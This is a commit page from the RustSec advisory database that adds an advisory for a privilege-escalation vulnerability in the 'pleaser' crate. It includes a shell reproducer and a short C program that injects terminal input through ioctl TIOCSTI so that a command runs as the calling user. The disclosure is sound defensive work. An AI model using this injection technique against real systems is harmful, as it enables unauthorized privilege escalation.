Document the privilege-escalation vulnerability in pleaser. (#1798)

* Document the privilege-escalation vulnerability in pleaser. Note that the reproducer doesn't work out of the box on a modern kernel, as the ioctl TIOCSTI is disabled by default nowadays * reviewer feedback: Include a description on how to check if you are vulnerable, fix a typo * Revert "reviewer feedback: Include a description on how to check if you are vulnerable, fix a typo" This reverts commit 94a4a83. * Fix typo --------- Co-authored-by: Sergey "Shnatsel" Davidoff <shnatsel@gmail.com>
rustsec · Oct 3, 2023 · 59c41cb · 59c41cb
1 parent 46754ce
commit 59c41cb
Showing 1 changed file with 49 additions and 0 deletions.
diff --git a/crates/pleaser/RUSTSEC-0000-0000.md b/crates/pleaser/RUSTSEC-0000-0000.md
@@ -0,0 +1,49 @@
+```toml
+[advisory]
+id = "RUSTSEC-0000-0000"
+package = "pleaser"
+date = "2023-04-29"
+url = "https://gitlab.com/edneville/please/-/issues/13"
+categories = ["privilege-escalation"]
+keywords = []
+cvss = "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+
+[versions]
+patched = []
+
+[affected]
+```
+
+# Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX
+
+please is vulnerable to privilege escalation using ioctls TIOCSTI
+and TIOCLINUX on systems where they are not disabled.
+
+Here is how to see it in action:
+
+```
+$ cd "$(mktemp -d)"
+$ git clone --depth 1 https://gitlab.com/edneville/please.git
+$ cd please/
+$ git rev-parse HEAD  # f3598f8fae5455a8ecf22afca19eaba7be5053c9
+$ cargo test && cargo build --release
+$ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini
+$ sudo chown root:root ./target/release/please
+$ sudo chmod u+s ./target/release/please
+$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
+#include <sys/ioctl.h>
+
+int main(void) {
+  const char *text = "id\n";
+  while (*text)
+    ioctl(0, TIOCSTI, text++);
+  return 0;
+}
+TIOCSTI_C_EOF
+$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
+$ ./target/release/please -u nobody /tmp/TIOCSTI  # runs id(1) as ${USER} rather than nobody
+```
+
+Please note that:
+
+This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.